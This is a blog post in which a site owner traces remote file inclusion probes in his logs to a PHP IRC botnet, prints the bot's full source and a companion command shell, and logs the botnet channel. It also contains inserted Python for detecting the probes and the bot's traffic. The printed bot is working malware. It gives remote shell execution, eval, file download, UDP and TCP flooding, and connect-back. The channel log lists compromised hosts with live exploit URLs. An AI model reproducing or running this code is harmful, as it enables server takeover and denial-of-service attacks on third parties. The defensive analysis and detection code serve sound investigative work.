This afternoon I was checking the referrals to this site and I stumbled across something odd. Naturally, as the tech-curious person that I am, I dug further, exploring the strange URL that referred to my site. Unbelievably enough, I found something hilariously serious. This is how I found the script kiddies, and it was quite funny.
If the script kiddies are looking at this, don’t be alarmed; I didn’t tell your parents how silly you can get sometimes. You’re only children and I forgive you. Just remember, in some countries you will get the chance to feel the cold steel that makes up a jail bar. If any law enforcement agencies are looking at this, first off know that I have nothing to do with this childish, stupid behavior, and you’re welcome to any information on this blog that will help investigate the idiot that started this thing. Also know that you can’t stop all of them due to the vast amount of immaturity that the world is drowning in.
Now back to the story. When I checked my referrals I saw this:
84.16.230.73 2008-07-08 17:47:59 /?include_path=http://www.diving-thailand-phuket.com/echo.txt?? unknown Windows 95 Internet Explorer 2.0 GERMANY Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
And another one, the same but with this URL:
/?include_path=http://5score.org/calendar/info/test.txt???
I laughed when I saw it. I was also alarmed, though, because I updated WP recently and wondered if it were a recent security vulnerability that I was not aware of. Nevertheless, the curious Mario kicked in. Before that I called up my hosting provider’s IT dept (whose CTO is my very good friend) to check for anything odd, since I do not have direct access to the machine that this site is hosted on. There were no signs of intrusion, so I went back to the fun part right away.
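Both referral entries are remote file inclusion probes: a query parameter whose value is an absolute URL to a script on another host. The Python below is an added example, not part of the original post, that flags such requests in rows of this referral-log layout; it also handles percent-encoded and double-encoded values, which goes beyond the two plain-text probes shown. The column layout, the `own_hosts` allowlist and every sample row except the first are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# A parameter value that is an absolute URL (scheme://authority...).
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://([^/?#\s]+)", re.IGNORECASE)

# Row 1 is the referral entry quoted in the post; rows 2-4 are constructed.
SAMPLE_LOG = """\
84.16.230.73 2008-07-08 17:47:59 /?include_path=http://www.diving-thailand-phuket.com/echo.txt?? unknown Windows 95 Internet Explorer 2.0 GERMANY Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
198.51.100.7 2008-07-08 17:48:10 /errors.php?error=http%253A%252F%252Ffiles.example.net%252Fpf.txt%253F%253F unknown Linux Firefox 2.0 NONE Mozilla/5.0
203.0.113.9 2008-07-08 17:49:02 /?s=php+include_path+tutorial unknown Linux Firefox 2.0 NONE Mozilla/5.0
203.0.113.9 2008-07-08 17:50:41 /wp-login.php?redirect_to=http%3A%2F%2Fblog.example%2Fwp-admin%2F unknown Linux Firefox 2.0 NONE Mozilla/5.0
"""


def fully_decode(value, rounds=2):
    """Undo extra layers of percent-encoding (parse_qsl already removed one)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_host(value):
    """Return the lower-cased host if value is an absolute remote URL, else None."""
    match = REMOTE_URL.match(value)
    if not match:
        return None
    authority = match.group(1)
    # Drop optional userinfo and port (IPv6 literals are not handled here).
    return authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def scan_target(target, own_hosts=frozenset()):
    """Inspect one request target; report parameters that carry a remote URL."""
    _, _, query = target.partition("?")
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        host = remote_host(value)
        if host is None or host in own_hosts:
            continue  # not a URL, or a redirect back to our own site
        findings.append({
            "param": name,
            "host": host,
            "url": value.strip(),
            # Both probes in the post end the URL with '?'; keep it as a signal.
            "trailing_qmark": value.rstrip().endswith("?"),
        })
    return findings


def find_rfi_probes(log_text, own_hosts=frozenset()):
    """Scan rows laid out as: ip date time request-target rest-of-line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(None, 4)
        if len(fields) < 4:
            continue
        for finding in scan_target(fields[3], own_hosts):
            hits.append({"ip": fields[0], **finding})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG, own_hosts={"blog.example"}):
        print(hit["ip"], hit["param"], "->", hit["url"])
```

On the PHP side, `allow_url_include = Off` stops `include` and `require` from fetching remote URLs at all, which is the setting these probes depend on being enabled.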
I visited the URLs mentioned in the string from the attempt to exploit the server and I found two PHP scripts.
echo.txt seemed to be an IRC attack bot written in PHP that does the following:
* Sets the PHP execution time limit to 0, which means no time limit.
* Joins an IRC server, specifically irc.oltreirc.net.
* Joins the following channels: ##cinestar, ##scream
* Sets a random nickname with the [A]k0d prefix followed by 4 random letters.
* Announces the hack, including a full `uname -a`
* Awaits further instructions
This PHP bot seems to be written by some guy that goes by the alias of devil__ (or something like that). I found a mention of “xdevil.org” in a comment in the code. It seems like just another script kiddie, though I could be wrong; I concluded this by visiting http://www.xdevil.org/. Nevertheless, echo.txt is available to you below for examination:
<?
set_time_limit(0);
error_reporting(0);
echo “h4ck3d”;
class pBot
{
var $config = array(”server”=>”irc.oltreirc.net”,
“port”=>”6667″,
“pass”=>”",
“prefix”=>”k0d”,
“maxrand”=>”4″,
“chan”=>”##cinestar”,
“chan2″=>”##scream”,
“key”=>”123457″,
“modes”=>”+p”,
“password”=>”plz”,
“trigger”=>”.”,
“hostauth”=>”*” // * for any hostname (remember: /setvhost xdevil.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range(”0″,”9″);
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send(”PASS “.$this->config['pass']);
$this->send(”USER “.$ident.” 127.0.0.1 localhost :”.php_uname().”");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(” “,$this->buf);
if(substr($this->buf,0,6)==”PING :”)
{
$this->send(”PONG :”.substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] ==”001″)
{
$this->send(”MODE “.$this->nick.” “.$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],”[\2uname!\2]: $uname (safe: $safemode)”);
$this->privmsg($this->config['chan2'],”[\2vuln!\2]: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
}
if(isset($cmd[1]) && $cmd[1]==”433″)
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf,” :”),2);
$msgcmd = explode(” “,$msg);
$nick = explode(”!”,$cmd[0]);
$vhost = explode(”@”,$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case “QUIT”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PART”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PRIVMSG”:
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == “*”))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “user”:
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],”[\2Auth\2]: Senha errada $nick idiota!!”);
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “restart”:
$this->send(”QUIT :restart commando from $nick”);
fclose($this->conn);
$this->start();
break;
case “mail”: //mail to from subject message
if(count($mcmd)>4)
{
$header = “From: <”.$mcmd[2].”>”;
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Impossivel mandar e-mail.”);
}
else
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Mensagem enviada para \2″.$mcmd[1].”\2″);
}
}
break;
case “safe”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”)
{
$safemode = “on”;
}
else {
$safemode = “off”;
}
$this->privmsg($this->config['chan'],”[\2safe mode\2]: “.$safemode.”");
break;
case “inbox”: //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = “From: <inbox”.$token.”@X-Ide.com>”;
$a = php_uname();
$b = getenv(”SERVER_SOFTWARE”);
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],”InBox Test”,”#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”\n\ngreetz: wicked\nby: dvl <marcsown@hotmail.com>”,$header))
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Unable to send”);
}
else
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Message sent to \2″.$mcmd[1].”\2″);
}
}
break;
case “conback”:
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case “dns”:
if(isset($mcmd[1]))
{
$ip = explode(”.”,$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyname($mcmd[1]));
}
}
break;
case “info”:
case “vunl”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
$this->privmsg($this->config['chan'],”[\2vuln\2]: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
break;
case “bot”:
$this->privmsg($this->config['chan'],”[\2bot\2]: phpbot 2.0 by; #crew@corp.”);
break;
case “uname”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
break;
case “rndnick”:
$this->set_nick();
break;
case “raw”:
$this->send(strstr($msg,$mcmd[1]));
break;
case “eval”:
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case “sexec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “exec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “passthru”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “popen”:
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],”[\2popen\2]: $command”);
$pipe = popen($command,”r”);
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan'],” : $pbuf”);
}
pclose($pipe);
}
case “system”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “pscan”: // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2open\2″);
else
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2closed\2″);
}
break;
case “ud.server”: // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2].” Senha: “.$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2]);
}
}
break;
case “download”:
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],”w”))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Nao foi possivel fazer o download. Permissao negada.”);
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Nao foi possivel fazer o download de \2″.$mcmd[1].”\2″);
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],”[\2download\2]: Arquivo \2″.$mcmd[1].”\2 baixado para \2″.$mcmd[2].”\2″);
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],”[\2download\2]: use .download http://your.host/file /tmp/file”); }
break;
case “die”:
$this->send(”QUIT :die command from $nick”);
fclose($this->conn);
exit;
case “logout”:
$this->log_out($host);
$this->privmsg($this->config['chan'],”[\2auth\2]: $nick deslogado!”);
break;
case “udpflood”:
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case “tcpflood”:
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,”$msg\r\n”);
}
function join($chan,$key=NULL)
{
$this->send(”JOIN $chan $key”);
}
function privmsg($to,$msg)
{
$this->send(”PRIVMSG $to :$msg”);
}
function notice($to,$msg)
{
$this->send(”NOTICE $to :$msg”);
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”apache”))
$this->nick = “[A]“;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”iis”))
$this->nick = “[I]“;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”xitami”))
$this->nick = “[X]“;
else
$this->nick = “[U]“;
}
else
{
$this->nick = “[C]“;
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send(”NICK “.$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],”[\2UdpFlood Started!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen(”udp://”.$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],”[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s “);
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],”[\2TcpFlood Started!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen(”tcp://”.$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],”[\2TcpFlood\2]: Error: <$e>”);
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],”[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.”);
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],”[\2conback\2]: tentando conectando a $ip:$port”); $dc_source = “”;
if (is_writable(”/tmp”))
{
if (file_exists(”/tmp/dc.pl”)) { unlink(”/tmp/dc.pl”); }
$fp=fopen(”/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl /tmp/dc.pl $ip $port &”);
unlink(”/tmp/dc.pl”);
}
else
{
if (is_writable(”/var/tmp”))
{
if (file_exists(”/var/tmp/dc.pl”)) { unlink(”/var/tmp/dc.pl”); }
$fp=fopen(”/var/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl /var/tmp/dc.pl $ip $port &”);
unlink(”/var/tmp/dc.pl”);
}
if (is_writable(”.”))
{
if (file_exists(”dc.pl”)) { unlink(”dc.pl”); }
$fp=fopen(”dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl dc.pl $ip $port &”);
unlink(”dc.pl”);
}
}
}
}
$bot = new pBot;
$bot->start();
?>
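The listing above also gives defenders a network fingerprint: a web server that sends this registration sequence to an IRC server is running the bot. The following Python is an added example, not part of the original post, that scores outbound IRC lines per connection against what `start()`, `set_nick()` and `main()` send; the capture format (flow id plus one client line), the sample traffic and the three-indicator threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# set_nick(): "[A]", "[I]", "[X]", "[U]" or "[C]" + prefix + maxrand (4) digits.
BOT_NICK = re.compile(r"^\[[AIXUC]\][A-Za-z0-9]+\d{4}$")
# start() puts php_uname() in the USER realname; OS names as seen in the chat log.
OS_BANNER = re.compile(r"^(Linux|FreeBSD|Windows NT|Darwin)\s")
# main() announces "[uname!]:" and "[vuln!]:" once the server sends 001.
ANNOUNCE = re.compile(r"^\[(uname|vuln)!\]:")

# Constructed capture: (flow id, line sent from the web server to an IRC server).
CAPTURE = [
    ("10.0.0.5:41822", "USER k0d4417 127.0.0.1 localhost :Linux web01 2.6.18-92.el5 #1 SMP i686"),
    ("10.0.0.5:41822", "NICK [A]k0d8830"),
    ("10.0.0.5:41822", "MODE [A]k0d8830 +p"),
    ("10.0.0.5:41822", "JOIN ##cinestar 123457"),
    ("10.0.0.5:41822", "PRIVMSG ##scream :[\x02uname!\x02]: Linux web01 2.6.18-92.el5 #1 SMP i686 (safe: off)"),
    ("10.0.0.5:41822", "PRIVMSG ##scream :[\x02vuln!\x02]: http://shop.example//?include_path=http://files.example.net/echo.txt??"),
    ("10.0.0.9:50110", "NICK alice"),
    ("10.0.0.9:50110", "USER alice 0 * :Alice"),
    ("10.0.0.9:50110", "JOIN #wordpress"),
    ("10.0.0.9:50110", "PRIVMSG #wordpress :anyone seen include_path= probes in their logs?"),
]


def parse_irc(line):
    """Split an IRC message into (COMMAND, params), dropping any :prefix."""
    line = line.rstrip("\r\n")
    if line.startswith(":"):
        _, _, line = line.partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return "", []
    return parts[0].upper(), parts[1:] + ([trailing] if sep else [])


def indicators_for(line):
    """Return the set of bot indicators that a single client line matches."""
    cmd, params = parse_irc(line)
    found = set()
    if cmd == "NICK" and params and BOT_NICK.match(params[0]):
        found.add("bot-style nick")
    elif cmd == "USER" and len(params) >= 4:
        if params[1:3] == ["127.0.0.1", "localhost"]:
            found.add("USER 127.0.0.1 localhost")
        if OS_BANNER.match(params[3]):
            found.add("uname in realname")
    elif cmd == "PRIVMSG" and len(params) >= 2:
        # The bot wraps its tags in IRC bold (\x02); strip it before matching.
        match = ANNOUNCE.match(params[1].replace("\x02", ""))
        if match:
            found.add("[%s!] announcement" % match.group(1))
    return found


def triage(capture, threshold=3):
    """Group indicators by flow and keep flows that reach the threshold."""
    seen = defaultdict(set)
    for flow, line in capture:
        seen[flow] |= indicators_for(line)
    return {flow: sorted(found) for flow, found in seen.items()
            if len(found) >= threshold}


if __name__ == "__main__":
    for flow, found in triage(CAPTURE).items():
        print(flow, "matches the PHP IRC bot:", ", ".join(found))
```

A single indicator such as the nick pattern can match ordinary users, which is why the verdict requires several indicators on the same connection.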
test.txt seems to be the rest of the script, which performs other functions. See below:
<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi(”uid”,ex(”id”))) || (@eregi(”Windows”,ex(”net start”)))){
echo(”Safe Mode of this Server is : “);
echo(”SafemodeOFF”);
}
else{
ini_restore(”safe_mode”);
ini_restore(”open_basedir”);
if((@eregi(”uid”,ex(”id”))) || (@eregi(”Windows”,ex(”net start”)))){
echo(”Safe Mode of this Server is : “);
echo(”SafemodeOFF”);
}else{
echo(”Safe Mode of this Server is : “);
echo(”SafemodeON”);
}
}
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(’exec’)){
@exec($cfe,$res);
$res = join(”\n”,$res);
}
elseif(function_exists(’shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(’system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(’passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
Let’s pay attention to the important part that makes things so interesting from echo.txt.
var $config = array("server"=>"irc.oltreirc.net",
"port"=>"6667",
"pass"=>"",
"prefix"=>"k0d",
"maxrand"=>"4",
"chan"=>"##cinestar",
"chan2"=>"##scream",
"key"=>"123457",
"modes"=>"+p",
"password"=>"plz",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
Just looking at it was a laugh. After going through the script, I quickly realized how bot nicknames are set and opened up xchat to pretend to be a bot. Joining the IRC server, I immediately joined the channels mentioned in the array. Please see the chat log below for further clarification. To be able to follow the chat log, note that my nickname was “k0d1237”.
<k0d1237> lol
<[A]k0d5823> yep
<[A]k0d5823> lol would I say also
<k0d1237> how pathetic does it get
<k0d1237> honestly
<[A]k0d5823> just finding out who is running this
<k0d1237> echo.txt ?
<k0d1237> oh
<k0d1237> you saw the logs too did you ?
<k0d1237>
<[A]k0d5823> yep
<k0d1237> lol
<k0d1237> lets act like bots for a minute
<k0d1237> [A]k0d5823, .say LOL
<k0d1237>
<[A]k0d5823> When you set your nick, like me
<[A]k0d5823> you can get also to ##cinestar
<k0d1237> im looking at their code
<[A]k0d5823> i did too
<k0d1237> irc on a php script , lol
<k0d1237> dont they know what firewalls are ?
<k0d1237> no outgoing connections for them
<[A]k0d5823> but if you join on ##cinestart you can see all haxored servers
* Cannot join ##cinestar (Channel is invite only).
<[A]k0d1057> [uname!]: Linux plesk.globalnetworks.gr 2.4.21-37.ELsmp #1 SMP Wed Sep 7 13:28:55 EDT 2005 i686 (safe: on)
<[A]k0d1057> [vuln!]: http://www.dh-gaming.com//?include_path=http://www.diving-thailand-phuket.com/echo.txt??
<k0d1237> rg/calendar/info/test.txt??? unknown Netscape Navigator 4.61 GERMANY Mozilla/4.61 [en] (OS/2; U)
<k0d1237> 84.16.230.73 2008-07-08 17:47:59 /?include_path=http://www.divi
<k0d1237> ng-thailand-phuket.com/echo.tx
<k0d1237> t??
<k0d1237> it even identifies as mozilla
* You are now known as [A]k0d3957
<[A]k0d8278> [uname!]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
<[A]k0d8278> [vuln!]: http://cyos.co.kr/bbs/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d8908> [uname!]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
<[A]k0d8908> [vuln!]: http://cyos.co.kr/bbs/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d3957> .quit
* [A]k0d5823 has quit (User has been permanently banned from OltreIrc ( unauthorized))
<[A]k0d5534> [uname!]: FreeBSD ns2.chmr.ru 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov 3 09:36:13 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
<[A]k0d5534> [vuln!]: http://www.chmr.ru//poll/booth.php?include_path=http://www.centrogassystem.com/frn/pf.txt???
<[A]k0d4001> [uname!]: FreeBSD server.brightlightmedia.co.uk 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Sun May 7 04:42:56 UTC 2006 root@opus.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP i386 (safe: off)
<[A]k0d4001> [vuln!]: http://www.nationalhotels.co.uk/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d8918> [uname!]: FreeBSD dl380.hppc.co.uk 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov 3 09:36:13 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
<[A]k0d8918> [vuln!]: http://www.hppc.co.uk/auction/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d7586> [uname!]: Linux iqnet.adverteaser.com 2.6.16-1.2111_FC4 #1 Sat May 20 19:59:40 EDT 2006 i686 (safe: off)
<[A]k0d7586> [vuln!]: http://www.iqnet-certification.com/index.php?page=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d1789> [uname!]: Windows NT EVBBS 5.1 build 2600 (safe: off)
<[A]k0d1789> [vuln!]: http://bbs.ev.vnu.edu.tw/phpbb2/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
* Now talking on ##cinestar
* [A]k0d8278 (~k0d1123@7F26F4C3.9717B992.2A42257.IP) has joined ##cinestar
* [A]k0d8908 (~k0d5189@7F26F4C3.9717B992.2A42257.IP) has joined ##cinestar
<[A]k0d3957> .quit
* ##cinestar :You need voice (+v) (##cinestar)
* [A]k0d7564 has quit (Ping timeout)
* Lilo (bluemoon@GlobalOp.OltreIrc.Net) has joined ##cinestar
* ChanServ sets mode +a ##cinestar Lilo
* ChanServ gives channel operator status to Lilo
* [A]k0d2697 has quit (Ping timeout)
* [A]k0d0700 has quit (Ping timeout)
* [A]k0d0666 has quit (Ping timeout)
* [A]k0d8617 has quit (Ping timeout)
* Azimuth (vsdfkvn@Iron.Steamer.never.Die) has joined ##cinestar
* ChanServ sets mode +a ##cinestar Azimuth
* ChanServ gives channel operator status to Azimuth
<Azimuth> uhm la & Pazzi di ##cinestar !!! non sapete in che guaio vi siete messi <-=®OscurO-script®=->
* Lilo (bluemoon@GlobalOp.OltreIrc.Net) has left ##cinestar
* [A]k0d5823 (~lare@A77B513A.7FF6ED4.F16AEF6D.IP) has left ##cinestar
<Azimuth> .user tic
-[A]k0d9931/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9886/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0577/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3702/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3100/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4398/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9618/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d1665/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7036/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8826/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d2290/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0908/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7913/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4132/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4017/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8421/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7027/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8109/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3180/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7677/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4164/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d5556/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0825/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9100/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0920/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4804/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4455/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d5564/##cinestar- [Auth]: Senha errada Azimuth idiota!!
<Azimuth> .user plz
-[A]k0d4880/##cinestar- [Auth]: Senha errada Azimuth idiota!!
<Azimuth> .user net
<Azimuth> .udpflood 80.220.30.135 9000 120
